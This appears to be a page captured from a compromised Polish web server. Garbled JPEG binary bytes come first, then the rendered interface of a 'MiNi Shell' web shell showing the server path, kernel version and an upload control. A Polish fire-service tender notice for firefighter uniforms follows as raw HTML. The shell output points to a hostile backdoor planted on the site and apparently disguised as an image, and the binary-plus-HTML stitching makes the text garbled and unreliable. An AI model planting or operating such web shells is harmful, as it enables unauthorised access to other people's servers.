JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240430/0030833601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA 80 KOMPLETÓW UBRAŃ SPECJALNYCH <br/>( 4 CZĘŚCIOWYCH) ORAZ BIELIZNY TERMO AKTYWNEJ DLA STRAŻAKÓW KOMENDY MIEJSKIEJ PAŃSTWOWEJ STRAŻY POŻARNEJ <br/>w CHEŁMIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Chełmie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KM PSP w Chełmie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110200225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prymasa Stefana Wyszyńskiego 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">825653428</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">825655550</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">km_chelm@straz.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strazchelm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA 80 KOMPLETÓW UBRAŃ SPECJALNYCH <br/>( 4 CZĘŚCIOWYCH) ORAZ BIELIZNY TERMO AKTYWNEJ DLA STRAŻAKÓW KOMENDY MIEJSKIEJ PAŃSTWOWEJ STRAŻY POŻARNEJ <br/>w CHEŁMIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0c07e386-06dc-11ef-bfd2-32fa350b5bfc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00308336</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00294615/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa 80 kompletów ubrań specjalnych 4 częściowych i bielizny termo aktywnejdla strażaków Komendy Miejskiej PSP w Chełmie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.lubelskie.straz.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">adres strony prowadzonego postępowania: https://przetargi.lubelskie.straz.gov.pl/ &gt;JEDNOSTKI,- &gt; KM PSP CHEŁM.<br/>adres strony internetowej, na której będą udostępniane zmiany i wyjaśnienia treści SWZ oraz inne dokumenty bezpośrednio związane z postępowaniem o udzielenie zamówienia: https://przetargi.lubelskie.straz.gov.pl/ &gt;JEDNOSTKI,-&gt; KM PSP CHEŁM.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający zgodnie z art. 67 ustawy PZP określa następujące wymagania techniczne <br/> i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej <br/> przy wykorzystaniu Platformy Zamówień Publicznych t.j.:<br/>6.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż <br/> 512 kb/s;<br/>6.2.komputer klasy PC lub MAC o następującej konfiguracji: pamięc min 2 GB Ram procesor<br/> Intel IV 2GHz, jeden z systemów operacyjnych – MS Windows 10, Mac Os x 10,4, Linux<br/> lub ich nowsze wersje;<br/>6.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/> obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>6.4. włączona obsługa JavaScript;<br/>6.5. zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>6.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez<br/> wystawcę certyfikatu używanego przez Wykonawcę.<br/><br/>7. Zamawiający, zgodnie z § 11 ust.2 rozporządzenia Rady Ministrów z dnia 30 grudnia 2020<br/> r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/> technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/> w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz.<br/> 2452) podaje następujące informacje na temat specyfikacji połączenia, formatu<br/> przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych:<br/>7.1. dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB <br/> w formatach: .doc, .pdf, .zip, .docx, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .xades, .sig,<br/>7.2. informacje na temat kodowania i czasu odbioru danych ; - plik załączony przez<br/> Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest <br/> w systemie jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/> dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/> składania ofert; <br/><br/>8. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/> (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest zsynchronizowany<br/> ze znacznikiem czasu UTC. Wykonawca powinien dokładnie zapoznać się z niniejszą<br/> SWZ i złożyć ofertę zgodnie z jej wymaganiami.<br/>9. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/> Zadawanie pytań może być dokonywane za pośrednictwem poczty elektronicznej na<br/> adres: km_chelm@straz.lublin.pl lub za pośrednictwem specjalnego modułu<br/> zamieszczonego na Platformie Zamówień Publicznych ZETOPZP<br/> https://przetargi.lubelskie.straz.gov.pl/-&gt;”JEDNOSTKI”-&gt; „KM PSP Chełm”. W celu<br/> skorzystania z modułu na Platformie Zamówień Publicznych ZETOPZP należy przejść do<br/> sekcji „Pytania i odpowiedzi” a następnie kliknąć przycisk – „Zadaj pytanie”, w tym<br/> momencie system otworzy formularz, w którym należy wpisać treść pytania oraz jeżeli jest<br/> taka potrzeba) dodać załącznik. Następnie należy kliknąć przycisk „Zadaj pytanie”.<br/> Pytania mogą zadawać tylko zalogowani użytkownicy (aby zadać pytanie należy posiadać<br/> konto w aplikacji).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://przetargi.lubelskie.straz.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem danych osobowych osób fizycznych pozyskanych w toku realizacji<br/> przedmiotowego zamówienia publicznego jest Komendant Miejski Państwowej Straży<br/> Pożarnej w Chełmie ul. Prymasa Stefana Wyszyńskiego 2B 22-100 Chełm;<br/>1.2. W Komendzie Miejskiej Państwowej Straży Pożarnej w Chełmie wyznaczony został <br/> Inspektor Ochrony Danych (20-012 Lublin ul. Strażacka 7 tel. 81 53 51 233, e-mail<br/> iod@kwpsp.lublin.pl);<br/>1.3. dane osobowe przetwarzane będą na podstawie art. 6 ust 1 lit C RODO w celu<br/> związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>1.4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/> dokumentacja postępowania w oparciu o art. 74 ust 1 i 2 ustawy z dnia 11 września<br/> 2019 r. Prawo zamówień publicznych ( t.j. Dz. U z 2022 r. poz. 1710);<br/>1.5.Dane osobowe będą przechowywane zgodnie z art. 78 ust 1 i 2 ustawy Prawo zamówień<br/> publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/> zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/> obejmuje cały czas trwania umowy;<br/>1.6. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym <br/> w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem <br/> w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/> określonych danych wynikają z ustawy Prawo zamówień publicznych;<br/>1.7. W odniesieniu do podanych danych osobowych decyzje nie będą podejmowane <br/> w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>1.8. Osoba, której dane osobowe pozyskano w toczącym się postępowaniu posiada<br/> następujące prawa:<br/>1.8.1. na podstawie art. 15 RODO prawo do dostępu do danych osobowych;<br/>1.8.2. na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/> przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. <br/> 18 ust. 2 RODO;<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/> osoba, której dane osobowe pozyskano w toczącym się postępowaniu uzna, <br/> że przetwarzanie danych osobowych dotyczących tej osoby narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe pozyskano w toczącym się postępowaniu nie przysługuje:<br/>1.9.1. w związku z art. 17 ust. 3 lit b,d,lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/> osobowych, gdyż podstawa prawna przetwarzania Pani/Pana danych osobowych jest<br/> art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ML.2370.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 560000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa 80 kompletów ubrań specjalnych czteroczęściowych (t.j. złożonych z kurtki i spodni oraz kurtki lekkiej i spodni lekkich – zgodnych z OPZ ujętym w załączniku nr 1) oraz 100 kompletów bielizny termo aktywnej (t.j. złożonych z koszulki z długim rękawem, koszulki t-shirt, długich spodni i skarpet).<br/>Oferowane ubrania i bielizna powinny być fabrycznie nowe, nieużywane i nieeksponowane na wystawach / pokazach / targach etc. Przedmiotowe ubrania powinny pochodzić od jednego producenta, być kompletne i zdatne do natychmiastowego użytku. Ubrania i bieliznę należy oferować zgodnie z tabelą rozmiarową stanowiącą załącznik Nr 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35113400-3 - Odzież ochronna i zabezpieczająca</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert:<br/>1.Cena całkowita brutto [CCB] 60 %<br/>2.Skrócenie terminu wykonania umowy [STWU] 20 %<br/>3.Okres gwarancji powyżej 24 miesięcy [OG] 20 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2. Skrócenie terminu wykonania umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">3. Okres gwarancji powyżej 24 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/> z postępowania na podstawie art. 108 ust.1 pkt. 4 ustawy PZP (przesłanka fakultatywna<br/> wykluczenia z postępowania). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przewiduje następującą fakultatywną przesłankę wykluczenia <br/> z postępowania, tj. przesłankę określona w art.109 ust 1 pkt. 4 ustawy PZP. <br/> Z postępowania o udzielenie zamówienia Zamawiający wykluczy wykonawcę w stosunku<br/> do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator<br/> lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona<br/> albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/> przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>4. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie<br/> postępowania o udzielenie zamówienia.<br/>5. Zgodnie z art. 110 ust 2 ustawy PZP, Wykonawca nie podlega wykluczeniu <br/> w okolicznościach określonych w pkt. 2.1., 2.2.,2.6. i 3. jeżeli udowodni Zamawiającemu,<br/> że spełnił łącznie następujące przesłanki:<br/>5.1. naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem <br/> lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>5.2. wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem lub swoim<br/> nieprawidłowym postępowaniem oraz spowodowanymi przez niego szkodami, aktywnie<br/> współpracując odpowiednio z właściwymi organami, w tym organami ścigania, <br/> lub Zamawiającym;<br/> 5.3. podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie <br/> dla zapobiegania dalszym przestępstwom lub nieprawidłowemu postępowaniu, <br/> w szczególności:<br/>5.3.1. zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi <br/> za nieprawidłowe postępowanie Wykonawcy,<br/>5.3.2. zreorganizował personel,<br/>5.3.3. wdrożył system sprawozdawczości i kontroli,<br/>5.3.4. utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów,<br/> wewnętrznych regulacji lub standardów,<br/>5.3.5. wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań <br/> za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 57 i art. 112 ustawy PZP, o udzielenie zamówienia publicznego mogą<br/> ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania oraz spełniają<br/> warunki udziału w postępowaniu dotyczące:<br/>1.2. zdolności do występowania w obrocie gospodarczym;<br/>1.3. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/> o ile wynika to z odrębnych przepisów;<br/>1.4. sytuacji ekonomicznej i finansowej;<br/>1.5. zdolności technicznej i zawodowej.<br/>2. W niniejszym postępowaniu, Zamawiający określa następujące warunki udziału <br/> w postępowaniu. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy,<br/> którzy:<br/>2.1. znajdują się w odpowiedniej sytuacji ekonomicznej i finansowej tj.:<br/>2.1.1. posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej<br/> działalności związanej z przedmiotem zamówienia na następującą minimalna sumę<br/> gwarancyjną tj.: 500 000 zł lub<br/>2.1.2. posiadają środki finansowe lub zdolność kredytowa na kwotę co najmniej 500 000 zł.<br/> W przypadku wyrażenia kwot wymienionych w tiret 1 i 2 w innej walucie niż polski<br/> złoty, kwoty te należy przeliczyć wg. średniego kursu złotego NBP (tabela A) z dnia<br/> publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> posiadają odpowiednią zdolność techniczną lub zawodową polegająca na:<br/>2.2.1. wykonaniu, a przypadku świadczeń okresowych lub ciągłych również wykonywaniu <br/> okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/> prowadzenia działalności jest krótszy – w tym okresie dostaw przedmiotów<br/> umundurowania specjalnego o wartości co najmniej 500 000 zł brutto <br/>2.2.2. dysponowaniu odpowiednimi stanami magazynowymi aktualnymi na dzień składania<br/> oferty zgodnie z tabelą rozmiarową stanowiącą załącznik Nr 2 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> wykazu wykonanych dostaw, a przypadku świadczeń powtarzających się lub ciągłych<br/> również wykonywanych, o cechach określonych w sekcji 8 pkt. 2.3.1 w okresie<br/> ostatnich 5 lat przed upływem terminu składania ofert, jeżeli okres prowadzenia<br/> działalności jest krótszy – w tym okresie wraz z podaniem ich wartości , przedmiotu,<br/> dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są<br/> wykonywane oraz załączeniem dowodów określających czy te dostawy zostały<br/> wykonane należycie lub są wykonywane należycie w przypadku świadczeń<br/> powtarzających się lub ciągłych, przy czym dowodami, o których mowa, są referencje<br/> bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały<br/> wykonane lub są wykonywane, jeżeli Wykonawca z przyczyn niezależnych od niego<br/> nie jest w stanie uzyskać tych dokumentów- 